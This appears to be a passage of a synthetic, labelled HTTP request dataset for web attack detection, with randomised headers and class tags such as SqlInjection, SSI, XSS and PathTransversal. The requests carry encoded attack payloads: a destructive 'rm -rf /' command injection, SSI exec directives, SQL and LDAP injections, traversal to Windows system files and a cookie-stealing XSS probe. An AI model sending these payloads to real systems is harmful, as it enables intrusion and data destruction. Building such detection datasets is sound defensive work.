Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Oct 04 12:14:36 CET
Last-Modified: Sun, 31 Dec 06 13:09:31 UTC
Host: 224.43.154.48:764
Connection: hdedatA
Accept: image/jpeg;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 102.25.110.183
Cookie: bnaaoUaqt3jne9=nziaun0qtr61;esfnitdiU=07
Cookie2: $Version="494"
Date: Thu, 23 Aug 07 13:00:29 GMT
ETag: "UbAFqweMK2mBj2hU"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Mon, 19 Jan 09 19:08:47 GMT
If-Unmodified-Since: Sat, 08 Dec 07 18:36:03 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 08 Sep 09 22:50:40 GMT
Max-Forwards: 1
MIME-Version: 4.4
Pragma: o1rsU=thle
Proxy-Authorization: Digest nc=F3B4A20E
Authorization: Digest cnonce="jmnyne"
Range: -292636,082693-
Referer: /tktn.asmx
TE: gzip;q=0.5,deflate,trailers
Trailer: If-None-Match
User-Agent: 8goma1tnop
UA-CPU: PowerPC
UA-Disp: 282,5050,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 357x895
Via: 8.5 www.m6dnesI.shtml:4938, 3.8 www.heu3kora.png, 9.3 www.euebVoe.png
Transfer-Encoding: gzip
Upgrade: dtOesl/5.5, bnmms/6.9, ehjAL/3.5, hrt/2.4
Warning: 685 www.notm7.js "acehl3taE" 
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 6520812020
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iAAvtLR@Ngi=fi&79Vr2eotrPwi=ueaiur7dzaae$&NJYUEO=tq7o&mwtdSr8ooteh=29&aetEgw6sr4pt=u2eeur~ebgirnbnullo&rq6&hie=ncF0@X@sy&ndrablelAue3uso= form3&teb5it=../../../../../../WINNT/autoexec.bat&hto6td=9cldeeytunDhge6&sdsruc9Unonuor=3KtQC_MKxsd_&8ncrmaar2s=dKE6R3

End - Id: 45427
Start - Id: 40006
class: SSI
GET /1I_Td1YEzP7oIF/etpdits_VZFBiq6xTzo/eJ2fnGY9Zaj/spicIe.jpg?lew9c=571955&idhmnohcuk=ooOjlaoaet%3Ao%2Fs&noritn6moiy=20&hceen8dj0=zsiframe&lndywal=906836&vjqRpvarIwdocumentMq=%3C%21--++%23exec+++++cmd%3D%22%2Fbin%2Fls++++-l+++++%2Fhome%2Ft1a21l%2Fmuie%22+--%3E&2locationexecyc=6336&8dyeirf3=8&bmiow0eru0d=387&2h=2v&un8R_=seT1mtenty HTTP/1.0
Host: www.nhjmre.biz
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: iso-8859-7, cp-936, x-mac-chinesesimp;q=0.4, euc-tw;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 21.123.30.222
Cookie: eogttfa=d;ssaugnoo=prrorOry3e8l;ee8zenexrhsu=ovno
Cookie2: $Version="105"
Date: Sun, 25 Jan 04 08:27:49 GMT
ETag: W/"yDGjnJnSi2OEj@O9zPi9"
Expect: hniFtla
From: biBccc@Aoelofph.de
If-Modified-Since: Sun, 13 Dec 09 15:17:44 GMT
If-Unmodified-Since: Sat, 23 Oct 04 08:00:14 UTC
If-Match: "I7rA8GDdpMZUlRoZtk"
If-None-Match: "3cWZDBWeMpko2kshKZO"
If-Range: Tue, 20 Sep 05 11:42:18 GMT
Max-Forwards: 610
MIME-Version: 5.0
Pragma: sL=ygcNu
Proxy-Authorization: ehoi omrlLio0=mhlctsr
Authorization: eas1 iwiremv=woet6
Range: 617798-3375,457727-6999
Referer: /2itbs.png
TE: deflate;q=0.1,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/6.6 (compatible; Konqueror/0.9; WinNT; yIm3oecol; tefhnt)
UA-CPU: Sparc
UA-Disp: 603,321,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 860x1351
Via: FTP/8.2 221.151.74.10, HTTP/4.0 www.hnsHa.jpeg, HTTP/7.2 160.153.35.253
Transfer-Encoding: deflate
Upgrade: iNatOe/5.8, 1TIi/6.0, rrnz/0.3, ale/7.7
Warning: 490 www.nelmaze.html "8xbzssdeyA" "Sat, 13 Jan 07 10:11:05 GMT"
X-Serial-Number: 18116
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40006
Start - Id: 43398
class: OsCommanding
GET /ijBfqS/u4.X/g1let1aiel3eaees/l0.shtml?.8B.=801&ca1OytEgoaryA=t%5DreplaceaetuAgu%3C&jnT0hnLtiatc8=%60+++rm+++-rf+++++%2F+++++%60&bq2ukgh2ayat=oFdTgbCt.&OirswleHos=-k%3D&sHu8A4o=Itbeeoiijt&bza6Skr=1&Tu=ee9ejgrmaTCeMn6t&rOnyoPqsgbh=74699171&marihigegoiwE5=14823&1E6DB=aw&tauanlrwtEopgn=02448 HTTP/1.0
Host: www.dStwt.st
Connection: keep-alive
Accept: image/*;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 143.76.65.70
Cookie: pollnnaym=14772388;ciaan3mer=utnr p;cbv=88843;seuemwdeo=aG0;tlwoiekhie=4707
Cookie2: $Version="5"
Date: Sat, 01 Oct 05 09:05:12 GMT
ETag: W/"AMQ50BgW5OZswZc"
Expect: r7zlrt=b3tw9ls;aeiop=hnEr
From: su7olsim@shSdnne.cz
If-Modified-Since: Wed, 13 Jun 07 17:06:51 CET
If-Unmodified-Since: Sun, 15 Nov 09 08:33:03 UTC
If-Match: "d30xvdIrjFZxaS-v2WxE"
If-None-Match: *
If-Range: *
Max-Forwards: 45
MIME-Version: 6.9
Pragma: tton5eal='rc3enq'
Proxy-Authorization: Basic dXNTYmEwOmVlc2g2
Authorization: NTLM cGMycmV6d2lwaXJ2cm93VHJnYWh2eWhtbXpockFjc3JlcHVO
Range: -4315,8885-439,063-
Referer: http://www.nrNiztkl.biz/awctws/zhntawdj.css
TE: trailers,gzip;q=0.3
Trailer: If-Range
User-Agent: u8IDoK http://www.iso2sn.ch
UA-CPU: StrongARM
UA-Disp: 3207,5717,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9788x122
Via: FTP/5.0 84.218.27.189
Transfer-Encoding: compress
Upgrade: 37mj/0.5, lgeOa/4.4, ot2tcN/1.9, rat/6.0, EpB/9.2
Warning: 667 www.eekudeq.shtml "ep6tpihnare" 
X-Forwarded-For: 207.33.218.68
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43398
Start - Id: 41907
class: SqlInjection
GET /zoEDPBXrxcLgD.iryD1/drnvonh/nlUu/sfOvt5CFW/sntdsen/ulsozjobjectui5m/X6BaX7lz/qw.html?adh=pt&orielnon49era=hooIhtnrroor5ewhs&erf=528&eer=982&o7avb65bsenaAt=%26oait&jrnuteesefr=dawynhhb&lmpouiystn=97842&1enmoqgtcbRfos=%27+or+++++id++in+++++%28+++select++++*++from+++++++user_db++%29&fhe=oNc9rltb&gts3=e%29be3yoobjectpu&t9HxehesnYae=inaox&ntmYaheazs=Piadmin&hoaus3sb=y&elS=eamxp_stles%40 HTTP/1.1
Host: www.r0eesssni.st:80
Connection: close
Accept: video/*, text/*, video/*;q=0.0
Accept-Charset: iso-8859-2;q=0.3, x-mac-roman, iso-8859-6, iso-8859-15, cp-932
Accept-Encoding: deflate, compress;q=0.7, deflate;q=0.8
Accept-Language: *
Cache-Control: max-stale=37
Client-ip: 199.227.44.84
Cookie: dna8=i;nacmPh9gn6tr=';AjvEvar=36335
Cookie2: $Version="24"
Date: Sat, 12 Mar 05 11:00:52 UTC
ETag: W/"NqsDhYv0afOW86tr"
Expect: doNNthyt=nejtsTs;rieoNrea
From: whodpi@rrheriuA.net
If-Modified-Since: Tue, 11 Aug 09 10:12:28 UTC
If-Unmodified-Since: Sat, 10 Nov 07 23:23:12 GMT
If-Match: "xgcg6lFX8YmoD1R"
If-None-Match: *
If-Range: *
Max-Forwards: 95
MIME-Version: 4.7
Pragma: 2=et
Proxy-Authorization: NTLM ZXI5aW5vc2VsdHJadGxldmVnYXJlZWFvYXVrczYxaXhPaXRlOA==
Authorization: NTLM TnR0Y2I2bm5kbG9tc2FlbHMwb2l1b3FsZGUzZXJhb25hc3NtZGphdWRhSXNlaXRu
Range: 814292-
Referer: http://avl0.gov/nhGxOfi/o3ihi.js
TE: trailers
Trailer: Via
User-Agent: rrrgoa/7.0.3
UA-CPU: MIPS
UA-Disp: 421,960,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9010x724
Via: FTP/6.3 www.ldiedm8.js, 1.5 57.87.41.62, FTP/6.8 112.208.48.17
Transfer-Encoding: Edrt; rNt4este=kln1h
Upgrade: ejskmd/8.1, itcsut/3.9, ooo/5.9
Warning: 953 227.225.5.69 "srsmu" 
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41907
Start - Id: 35371
class: SqlInjection
GET /dOsikPfT/2angtRoehrntteaEq3/r97sqokFU0WqW/nl8tmr6ceIsx/anesanhsssecKol/8GT36YmDTr/LyD.GtK/gHqOUYJYqnwmsvZnaY/wbgsoundZ/mzkrcifnnau.bin?VhsystemI9=022&ls=b%264iy&yssqapecaSNsn2e=bhl%29s&uah=aq&tkaaane=OR+++++%27tsnh%27++++%3D+++%27+++%27 HTTP/1.0
Host: 41.181.86.202
Connection: close
Accept: */*
Accept-Charset: windows-874, koi8, iso-8859-2;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 170.78.145.207
Cookie: e2arltlxrlty=022836441
Cookie2: $Version="80"
Date: Tue, 15 Mar 05 22:47:09 UTC
ETag: "WV6CGznXF0kSVufls"
Expect: jetudl=mtent
From: oora@antny.ch
If-Modified-Since: Mon, 30 Mar 09 07:21:00 CET
If-Unmodified-Since: Wed, 11 Nov 09 16:58:16 UTC
If-Match: *
If-None-Match: "bFdRT8xK21ndwI7ubf"
If-Range: *
Max-Forwards: 1
MIME-Version: 9.1
Pragma: kcnMe='dn1fyi9h'
Proxy-Authorization: Digest realm
Authorization: Basic ZTBrbGV0OmFpYTQwc2VT
Range: 187-
Referer: /i9ssy/nou8ats/7sa30sD.bin
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/2.6 (Windows; U; Windows NT 7.6; ou-ep; rv:0.9.2) Gecko/69008915
UA-Pixels: 1597x768
Via: 5.6 104.233.219.156
Transfer-Encoding: compress
Warning: 762 www.s9npa.html "1dtnonqawlaGpaprtcfe" "Wed, 25 Jul 07 09:35:32 UTC"
X-Serial-Number: 4224204056038719
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35371
Start - Id: 40461
class: SSI
GET /tstwguyN5ht/8035IszsG/badaeuhQot2oalsqto/d7gon8/oD.js?deleteW.FZJbgsoundu1QmX=o2MBQR&gcoedl=%3C%21--%23include++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++++--%3E&rayg6crxRHks=4507&KsrkMEg=laCWG-vg&osi0Slmslt8hrt=%24dOpm+rhiye%27&d69i6nesa=70&ADtes=nascriptwnMhRxm3+itmmnn HTTP/1.1
Host: 91.161.171.55:80
Connection: hlruzooo
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 210.221.137.101
Cookie: iat5etdeolLiEa=iTrV60G-qAy;lou=sX@Q
Cookie2: $Version="52"
Date: Sat, 01 Dec 07 24:05:21 GMT
ETag: W/"CWkiioo0WdACHhp"
Expect: 100-continue
From: npmo@pBctcq.com
If-Modified-Since: Fri, 09 Jan 04 22:03:16 GMT
If-Unmodified-Since: Wed, 13 Jan 10 09:51:57 GMT
If-Match: *
If-None-Match: "680U4PU2gnOPeuy"
If-Range: Sat, 09 May 09 04:24:11 GMT
Max-Forwards: 57
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: dtrt2 kDisu=hfooe
Range: 688-12571,5864-06540,0825-1066
Referer: /hmyruId/md7g/se9nF.cgi
TE: trailers,chunked;q=0.9
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.2 (Machintosh; U; PPC Mac OS X 3.7; bH-fa; rv:6.7.7) Gecko/86863300
UA-CPU: 68000
UA-Disp: 0939,1824,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 025x185
Via: FTP/9.7 65.39.60.98, 9.9 84.41.72.90, FTP/7.8 95.97.224.130
Transfer-Encoding: gzip
Upgrade: ytiE/1.4
Warning: 466 70.136.39.206 "sssc" 
X-Forwarded-For: 197.226.53.190
X-Serial-Number: 98565372421828
----: -------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 40461
Start - Id: 45902
class: PathTransversal
GET /xCj9hC6XyN2v9t2qw/0nph-positionhQhaving/G8jVpassthru/rDweDgSXnGF/monchinewnipu31ae8/reDkWClMD7w/4aIyBnHDTPg.tiff?dFTD8O85opt=20291&a1=519265&5pgOxp_Eh=enetcathsh&STwXwV@gyA.U=27646192&re=siHng061a&VlogBhttp@gA2JWH=0sS4go8sa&jtwptnoo=sisrtkni&UxNJYrDNC=wJpSZr8AO9Di&Ebsioh7izsu=e4msr%3EncatG%3DDed&i7asiSa0e=%24&twlWten=m%3A%5Cwinnt%5Cboot.ini&WUXcexecnulliKpsFHg=6276107881&i23th=rahlaek&X4Hwhere%udocument=eerxbhsidse%5Cs HTTP/1.0
Host: www.9mkesNo.biz:18
Connection: close
Accept: */*
Accept-Charset: iso-8859-9;q=0.4, x-mac-chinesesimp;q=0.0, euc-tw
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=4035
Client-ip: 150.120.252.37
Cookie: eoli=ibetweenthdadminoc;lAKaccess_log=hot2eeo6la
Cookie2: $Version="32"
Date: Thu, 20 Oct 05 01:32:44 CET
ETag: "I5Zacwl6TPqEQ2Zm"
Expect: 100-continue
From: sdns@tal3sea.gov
If-Modified-Since: Wed, 04 Feb 09 12:20:28 UTC
If-Unmodified-Since: Tue, 17 Feb 04 03:08:23 CET
If-Match: "@Q1Dt5@C6Bqm0D-n"
If-None-Match: *
If-Range: Sat, 05 Nov 05 03:25:14 GMT
Max-Forwards: 7
MIME-Version: 4.5
Pragma: e='dxiEh'
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: Digest nc=3A514cE2
Range: -431939,983-,0-
Referer: /desolaf.txt
TE: trailers
Trailer: Accept-Encoding
User-Agent: odslmIbGfg1docrHrh
UA-CPU: StrongARM
UA-Disp: 1794,840,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1031x814
Via: 2.7 www.Izhie.html, HTTP/7.6 www.deRe5aec.tiff
Transfer-Encoding: compress
Upgrade: 9sy/9.0, apeda/8.6, mmS3/2.1
Warning: 059 www.ksairqwg.js:39883 "donee6dnsowllcjs" "Sat, 22 Jan 05 11:00:58 CET"
X-Forwarded-For: 205.145.84.10
X-Serial-Number: 447963296121692
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45902
Start - Id: 45082
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.1
Host: www.fieab.it
Connection: close
Accept: */*
Accept-Charset: iso-8859-4;q=0.3
Accept-Encoding: compress, gzip;q=0.0, identity;q=0.5
Accept-Language: ce-son1ztp;q=0.0, tui5li-obftma6;q=0.8, luhMoEe-r1nNb6r;q=0.0
Cache-Control: min-fresh=6
Client-ip: 11.179.164.13
Cookie: Sand@uBstyle=602505
Cookie2: $Version="865"
Date: Mon, 14 Feb 05 21:11:30 GMT
ETag: W/"ripDnExYI_q8e4R"
Expect: 100-continue
From: hn2w6xt1@ocg8cedowl.net
If-Modified-Since: Wed, 30 Nov 05 11:41:10 CET
If-Unmodified-Since: Mon, 20 Mar 06 13:02:50 GMT
If-Match: "m7e8SWEORE3SARe6"
If-None-Match: *
If-Range: "dE-XGHqUO90YpYkq"
Max-Forwards: 532
MIME-Version: 9.2
Pragma: ly4z='pj'
Proxy-Authorization: Digest cnonce="lEha"
Authorization: NTLM ZWZzcGhlU3JhdGRXb2hyb3R0a3RybHpQaWVydGRpdXRkZW8=
Range: 51016-,-10087
Referer: http://www.sqtsLr.biz/slat3/mens.png
TE: trailers,chunked
Trailer: Connection
User-Agent: lHFncC http://www.hlnTqwdr.ch
UA-CPU: StrongARM
UA-Disp: 0628,6146,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 003x764
Via: FTP/7.9 www.mRxmnsan.js, 3.1 www.6ordyRs.gif:8362, tn90et/0.7 www.3get.html
Transfer-Encoding: compress
Upgrade: tTRadh/8.4, hsrdna/9.0, cgtlfu/8.3
Warning: 437 www.epd64fo.jpeg "eNe3tlcu" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 324503957971792
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45082
Start - Id: 38218
class: LdapInjection
GET /rIbcwatlxbbneateze/mi6ANl4FR12/Ieorcaneeaa/ysyos9endjoransOens/e.DaoteAUi3Lg@v.v/4QSN.php4?u7mVJpfsspI=%29%28+%7C+%28oumh%3Dleoa*%29&43VBKEM=mzObG0&processing-instructionG_0d@4@Hmocha=nwgn89orhiEx6ldofa&LHO-=791&VueopenJ_=elfn2%40gX&FpMP2_P=pb&th8t=gMF&deltTnemdfA9ss=atdt%3Dmototgnd&tpD=jh0llte+%3ErtlSw HTTP/1.1
Host: 153.143.125.224:80
Connection: keep-alive
Accept: video/*;q=0.6, audio/basic, text/xml
Accept-Charset: x-mac-japanese;q=0.2, iso-8859-9, iso-8859-8-i;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 9.211.101.123
Cookie: e98uhsscasq=2;stzdBEd=oHmdaBlie;I4J9K3MTD7wE=pQjK817o-jPE;7yrZbistPm=ne5;positionjvH_2mrcptelnet8vc=wRoUqcx
Cookie2: $Version="88"
Date: Fri, 24 Aug 07 03:09:58 GMT
ETag: "HeHqGgYUuhkexda"
Expect: frgofie
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Sat, 31 Jul 04 13:58:58 GMT
If-Unmodified-Since: Tue, 05 Jan 10 08:12:00 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 28 Feb 05 23:10:28 CET
Max-Forwards: 4667
MIME-Version: 3.2
Pragma: evt='g'
Proxy-Authorization: fenea desahf1=7eTtla
Authorization: Basic eGV1YmVtcDpyaWhwb2RlaQ==
Range: -921
Referer: http://www.eis63yjn.biz/Hdsb/ocoa9N/7nmdsa1.txt
TE: trailers
Trailer: If-None-Match
User-Agent: ensilAaso (tdzMS_NIQR; e2IwGnYw; ug_B_9B9)
UA-CPU: 68000
UA-Disp: 912,7281,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 321x2267
Via: irr/1.8 www.essdcEom.html:3466, eC8a/1.9 244.40.26.24, FTP/2.1 www.leii.html
Transfer-Encoding: deflate
Upgrade: sdlwO/6.2, 4Awth/6.5, lsy/1.6, jri/4.6
Warning: 794 74.86.217.193 "6bkyotjee" "Mon, 16 Feb 09 06:30:50 GMT"
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 47317311019714332645
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38218
Start - Id: 47165
class: XSS
GET /kHkG8jJQygk1iW/axB2ksHL.css?UvoiroLsTcselho=17046762&tedtantio=Mbes%22+++++++%3E%3Cbody%2520onload%3Dalert+++%28document.cookie%29%3B++%3E&a.DKAW=o+t5&hvdxacetoieos0=606254&eaywbetween=+%5Bqns%28%29bCek+1i HTTP/1.1
Host: 235.219.222.197
Connection: close
Accept: */*;q=0.5
Accept-Charset: big5;q=0.7, iso-8859-4;q=0.3, iso-8859-4;q=0.6, x-mac-hebrew
Accept-Encoding: 
Accept-Language: og-annlepf, ntas4t-s, tdnexi2-hih83e;q=0.1, tlagyn-0ul;q=0.6, 95ag-bam
Cache-Control: max-stale
Client-ip: 46.131.2.199
Cookie: eohasf9R=4824803;9BvbscriptJ=eo;sde=eegov;FnFtEln=6v;qm0cihhobxei7M=aiSueetysws;jdrne0r=tb
Cookie2: $Version="4"
Date: Mon, 04 Oct 04 20:34:56 UTC
ETag: W/"9@Bw_-eoMUThmpdWyC6"
Expect: gtnerzt=Id9itho;tuni=iedt2
From: rRktr@tnrerr.uk
If-Modified-Since: Tue, 09 Oct 07 15:31:44 UTC
If-Unmodified-Since: Tue, 15 Jan 08 02:45:59 GMT
If-Match: *
If-None-Match: *
If-Range: "4w@F20wa9jsbLKaS@69"
Max-Forwards: 5942
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM dEUxZGV0c2VodGlnbWxnRW93bGJhaGVhM29lTmF3d2RleGxlZ3N0YmlMZXVz
Authorization: Basic aWllbmlnbTpjZW90
Range: -016,1-,67332-47295
Referer: http://www.lettlh.com/8cc6u/dnxniri/4jsoe.swf
TE: gzip;q=0.3,trailers
Trailer: If-Range
User-Agent: Mozilla/0.1 (Windows; U; Windows NT 8.3; tt-rs; rv:7.8.7) Gecko/47545796
UA-CPU: 68000
UA-Disp: 9157,127,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6020x621
Via: HTTP/1.8 69.67.233.218:7
Transfer-Encoding: gzip
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 131 246.175.42.21 "cjoft" 
X-Forwarded-For: 36.159.65.174
X-Serial-Number: 02973768667711464
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47165
Start - Id: 40000
class: SSI
GET /AYy@Ispn/iKYnAH8hv_V/uBK@_PY1LkbMH/r.WslIVru@Nq2v@P8/eccraqroa0chn/3yKo1/ttalfio8al1Fabdxeje/fT.@JkQNR/6Ns68attR3/uio1negAhnfuvwL.php4?t5ata=6dnntpoLh5lneri&iphr2o=92so66-Nakh&oz=g1ntsnouuhet&eginndow=te&gETho5tsa2h=%3C%21--+++%23exec+++++cmd%3D%22%2Fbin%2Fls+++++-l++%2Fhome%2FsslateRO%2FOs%22+--%3E HTTP/1.1
Host: 22.159.186.116:80
Connection: close
Accept: text/*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: et7t-tmqhoBr, tsvfPb-muAsSns, eaupt-udf, rdmp1tc-truo;q=0.9
Cache-Control: min-fresh=38678
Client-ip: 253.235.28.77
Cookie: astspsa=iv7Q@tiul2o_
Cookie2: $Version="26"
Date: Fri, 04 May 07 12:40:34 GMT
ETag: W/"yDGjnJnSi2OEj@O9zPi9"
Expect: i6odg8a
From: atetgwlh@rphs.com
If-Modified-Since: Thu, 18 Feb 10 08:40:15 CET
If-Unmodified-Since: Thu, 25 Dec 08 18:42:25 UTC
If-Match: "dcIm5kvGygEa88tv9lZ"
If-None-Match: "3cWZDBWeMpko2kshKZO"
If-Range: Sat, 10 Nov 07 15:50:00 CET
Max-Forwards: 99
MIME-Version: 5.0
Pragma: l=e0oifetL
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest qop=auth-int
Range: 33658-,347-
Referer: http://www.oZt4cs.fr/tsimrh/shtn.pl
TE: deflate;q=0.0
Trailer: TE
User-Agent: Mozilla/5.5 (Windows; U; Win 9x 4.2; gr-lt; rv:5.4.1) Gecko/13815728
UA-CPU: Sparc
UA-Disp: 2956,4144,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 860x1351
Via: HTTP/0.9 203.144.139.224
Transfer-Encoding: deflate
Upgrade: iNatOe/5.8, 1TIi/6.0, rrnz/0.3, ale/7.7
Warning: 490 www.nelmaze.html "8xbzssdeyA" "Sat, 13 Jan 07 10:11:05 GMT"
X-Serial-Number: 18116
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40000
Start - Id: 41420
class: SqlInjection
POST /nlZY7Kp/ehW8T2SiG-.dxPt/0G/563xtmpwTBm8Wi/tn47bdJyoEUcA/idql0f3oZU/lth/rZPjNsALzV2.php3? HTTP/1.0
Content-Length: 126
Content-Language: pjfnac,l0iug
Content-Encoding: compress
Content-Location: http://xltl8.be/leaAs/pocyljbw/cencih/ltelh/siRrseet.pl
Content-MD5: aXNlb3JkSGNydG5yZGxlNg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Oct 04 20:23:14 CET
Last-Modified: Sat, 15 Mar 08 11:01:58 UTC
Host: www.rhgxn5cn.com
Connection: keep-alive
Accept: image/*;q=0.7, application/rtf
Accept-Charset: us-ascii;q=0.4, windows-1251, ks_c_5601-1987;q=0.7, koi8-r
Accept-Encoding: *;q=0.6
Accept-Language: dyeeifsA-ced, eeatguu-atre;q=0.2, eliaefos-veIt
Cache-Control: max-age=87
Client-ip: 180.8.150.200
Cookie: usnoeenteae=st/=;u6fHm=tbr:
Cookie2: $Version="458"
Date: Sat, 09 Feb 08 13:11:11 GMT
ETag: W/"4aBq-mQ1_DiT7vYxf"
Expect: crLaessn=srlDb
From: eznB@Adtctleba.uk
If-Modified-Since: Sat, 01 Dec 07 02:18:44 UTC
If-Unmodified-Since: Thu, 11 Feb 10 04:25:01 UTC
If-Match: "FTba.-n9fS1b70R"
If-None-Match: "ovDEwK4quk4sKKVf"
If-Range: Tue, 13 Jan 04 24:40:54 GMT
Max-Forwards: 1423
MIME-Version: 2.2
Pragma: 91='usotmi'
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: Digest username="dunoi"
Range: 4509-,62-022408,-4198
Referer: /vhompffo/rhher.mp3
TE: trailers,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: k_RmQxNaCM http://www.9ybTeon.net
UA-CPU: MIPS
UA-Disp: 0773,9723,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 738x118
Via: HTTP/7.0 75.54.21.253:1
Transfer-Encoding: lhcoit; rnhbbou=17oeeno6
Upgrade: rht/5.4
Warning: 149 193.52.96.248 "8Xhauustfrrwxeheore" 
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 9168693821015244526
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

s5iehs='     OR    'e1rrs6eohiga'    LIKE  'aze%25&e6o5suy8CNLDk=nos)hshpohisb;&eokdwor6mhohta=cT0Rvkw&5ta=e9-.5

End - Id: 41420
Start - Id: 35020
class: SSI
GET /heshjnrfodeoo9/kNOgCkqS8rsmF9pYEtF/ogZO8dSpqN/rtetpzmSbeo6oulr/AV/o7oPA4lJ-ycGjh9yoGZ/amimAQo5XxlWqz/mdM/nse5Oriera8tHTsmtD/bgbFzOLQerzl/rK.7se6r9nMMeRHtQQQQ/wl3mlkmwalsgxiblNav.css?oeir=%3C%21--+++%23odbc++++statement+%3D++%22select+++d8%2C+++enFcetie%2C+o5drt+++++from+++a2ycce+++++order+++by+2%2C+08%2C++1%22+--%3E&eztixo=auMqs6K6y0 HTTP/1.1
Host: 196.6.77.190
Connection: keep-alive
Accept: image/*, image/jpeg, text/xml
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: MucO='yow'
If-Modified-Since: Thu, 13 Jul 06 08:15:25 UTC
If-Unmodified-Since: Sun, 02 Nov 08 18:21:23 UTC
Referer: /1oEzauso/9eofesa.aspx
Trailer: User-Agent
User-Agent: ze4ern3ty (a2S@aSQ; akZJ8iA; mTtPymDw-N; atlA7gvVgV; a6-isR)
Transfer-Encoding: compress
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 35020
Start - Id: 37027
class: LdapInjection
GET /IVFhB4VpGS0DIO/TufjMin@/sX0OQwZE6B/dw/elDlgettt5nE/giihlkiasarrsobdgo/r5opYl.@vsfk-ufve5Pk.gif?NX7vfromS=0526&1RallBg=%29%28%7C+%28rr0%3D3zg*%29&3wd=lvtlumyd7b&oxnm=ung&mnnemh9=52&wi61iqJDlike2=2914&ooqahutoa6seped=ngejcateraanodejo%27+lm+c&felturhs8tw5l=uniIvntw HTTP/1.0
Host: www.Antcn.org
Connection: keep-alive
Accept: application/*, video/*
Accept-Charset: macintosh, windows-1253, windows-1254, euc-kr;q=0.0, iso-8859-5;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 201.0.26.84
Cookie: r2hs2rg6wr=459;etnqWteilabohlr=ule copy
Cookie2: $Version="984"
Date: Wed, 16 Jul 08 17:24:24 UTC
ETag: ".SThcMpKfONI8Cjdcf"
Expect: kodtt
From: B3nrc@Ecode1.gov
If-Modified-Since: Sat, 11 Jun 05 14:55:03 CET
If-Unmodified-Since: Mon, 26 Feb 07 07:31:34 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 11 Oct 08 13:59:29 CET
Max-Forwards: 7
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: 7leiRa otmjthT=taes
Range: 952638-,75883-52
Referer: http://www.r3snoec.de/i3oc/eihd/u5OtF/tcdrE.jsp
TE: trailers
Trailer: Connection
